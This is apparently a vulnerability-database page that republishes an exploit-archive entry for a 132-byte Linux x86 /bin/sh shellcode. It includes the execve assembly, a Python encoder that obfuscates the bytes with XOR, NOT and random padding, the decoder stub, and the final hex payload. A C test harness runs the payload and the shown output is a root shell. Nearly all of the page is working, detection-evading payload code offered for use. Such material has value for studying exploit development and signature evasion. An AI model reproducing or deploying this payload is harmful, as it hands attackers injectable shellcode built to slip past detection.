Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)

🗓️ 07 Oct 2019 00:00:00Reported by bolonoboloType 
zdt
 zdt🔗 0day.today👁 200 Views

Linux x86 /bin/sh shellcode with XOR-N + Random Encodin

Code
# Date: 4th October 2019
# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
# Tested on: Linux x86

######################## execve.asm ###############################

global _start			

section .text
_start:
	
	
	; put NULL bytes in the stack
	xor eax, eax
	push eax
	
	//bin/sh
	push 0x68732f6e
	push 0x69622f2f
	mov ebx, esp
	
	; push NULL in the EDX position
	push eax
	mov edx, esp

	; push in the stack and then move it in ECX
	push ebx
	mov ecx, esp

	; call the execve syscall
	mov al, 11
	int 0x80
###############################################################

compile the execve-stack
$ nasm -f elf32 execve.asm
$ ld -N -o sh execve.o
$ echo;objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

########################## encoder_mixer.py ####################

#!/usr/bin/python

# Python Encoder (XOR + NOT + Random)
import random
green = lambda text: '\033[0;32m' + text + '\033[0m'

shellcode =
("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""

# The end char is 0xaa
end = "\\xaa"

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :

        if x < 128:
                # XOR Encoding with 0xDD
                x = x^0xDD
                # placeholder for XOR is 0xbb
                encoded += '\\xbb'
                encoded += '\\x'
                encoded += '%02x' % x
        else:
		# NOT encoding
                x = ~x
		# placeholder for NOT is 0xcc
                encoded += '\\xcc'
                encoded += '\\x'
                encoded += '%02x' % (x & 0xff)

	 # 0xaa is 170 in dec and the others placeholders are > of 170
        encoded += '\\x%02x' % random.randint(1,169)

print green("Shellcode Len: %d" % len(bytearray(shellcode)))
print green("Encoded Shellcode Len: %d" % len(bytearray(encoded)))
encoded = encoded + end
print encoded
nasm = str(encoded).replace("\\x", ",0x")
nasm = nasm[1:]
# end string char is 0xaa
print green("NASM version:")
# end = end.replace("\\x", ",0x")
print nasm

###################################################################

root@root:$ ./encoder_mixer.py
Encoded shellcode ...
Shellcode Len: 25
Encoded Shellcode Len: 300
\xbb\xec\x26\xcc\x3f\x4a\xbb\x8d\x3d\xbb\xb5\x44\xbb\xb3\x5b\xbb\xf2\x65\xbb\xae\x09\xbb\xb5\x2a\xbb\xb5\x2b\xbb\xf2\x1a\xbb\xf2\x4d\xbb\xbf\x9a\xbb\xb4\x61\xcc\x76\x56\xcc\x1c\x59\xbb\x8d\x56\xcc\x76\x6c\xcc\x1d\x94\xbb\x8e\x02\xcc\x76\xa5\xcc\x1e\x6d\xcc\x4f\xa3\xbb\xd6\x22\xcc\x32\x18\xcc\x7f\x7b\xaa
NASM version:
0xbb,0xec,0x26,0xcc,0x3f,0x4a,0xbb,0x8d,0x3d,0xbb,0xb5,0x44,0xbb,0xb3,0x5b,0xbb,0xf2,0x65,0xbb,0xae,0x09,0xbb,0xb5,0x2a,0xbb,0xb5,0x2b,0xbb,0xf2,0x1a,0xbb,0xf2,0x4d,0xbb,0xbf,0x9a,0xbb,0xb4,0x61,0xcc,0x76,0x56,0xcc,0x1c,0x59,0xbb,0x8d,0x56,0xcc,0x76,0x6c,0xcc,0x1d,0x94,0xbb,0x8e,0x02,0xcc,0x76,0xa5,0xcc,0x1e,0x6d,0xcc,0x4f,0xa3,0xbb,0xd6,0x22,0xcc,0x32,0x18,0xcc,0x7f,0x7b,0xaa

#################### decoder_mixer.asm ############################

global _start			

section .text
_start:


	jmp short call_decoder
	
	
decoder:
        ; the sequence of the chars in shellcode is:
	; placehlder,obfuscated shellcode char,random char
	pop esi
        lea edi, [esi]
        xor eax, eax
        xor ebx, ebx

switch:

        mov bl, byte [esi + eax]
        cmp bl, 0xaa
        jz shellcode
        cmp bl, 0xbb
        jz xordecode
        jmp notdecode

xordecode:

        mov bl, byte [esi + eax + 1]
        mov byte [edi], bl
        xor byte [edi], 0xDD
        inc edi
        add al, 3
        jmp short switch

notdecode:

        mov bl, byte [esi + eax + 1]
        mov byte [edi], bl
        not byte [edi]
        inc edi
        add al, 3
        jmp short switch

call_decoder:
	
	call decoder
	shellcode: db
0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa

############################### shellcode ############################

$ nasm -f elf32 decoder_mixer.asm
$ ld -o decoder decoder_mixer.o
$ objdump -d ./decoder_mixer|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
-d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa"

## Put the hex code in a C script

root@root:# cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x31\x5e\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xfb\xaa\x74\x27\x80\xfb\xbb\x74\x02\xeb\x0e\x8a\x5c\x06\x01\x88\x1f\x80\x37\xdd\x47\x04\x03\xeb\xe3\x8a\x5c\x06\x01\x88\x1f\xf6\x17\x47\x04\x03\xeb\xd6\xe8\xca\xff\xff\xff\xbb\xec\x73\xcc\x3f\x9d\xbb\x8d\x51\xbb\xb5\x1b\xbb\xb3\x22\xbb\xf2\x79\xbb\xae\x8e\xbb\xb5\x61\xbb\xb5\x3d\xbb\xf2\x6e\xbb\xf2\x9f\xbb\xbf\x10\xbb\xb4\x89\xcc\x76\x2d\xcc\x1c\x2f\xbb\x8d\x91\xcc\x76\x7e\xcc\x1d\x92\xbb\x8e\x80\xcc\x76\x7b\xcc\x1e\xa7\xcc\x4f\x7f\xbb\xd6\x2b\xcc\x32\x24\xcc\x7f\x37\xaa";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}



root@root# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@root# ./shellcode
Shellcode Length:  132
# whoami
root
# exit

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Oct 2019 00:00Current
7.1High risk
Vulners AI Score7.1
linux x86shellcodeencodingassemblersecurityrandomxor-n
200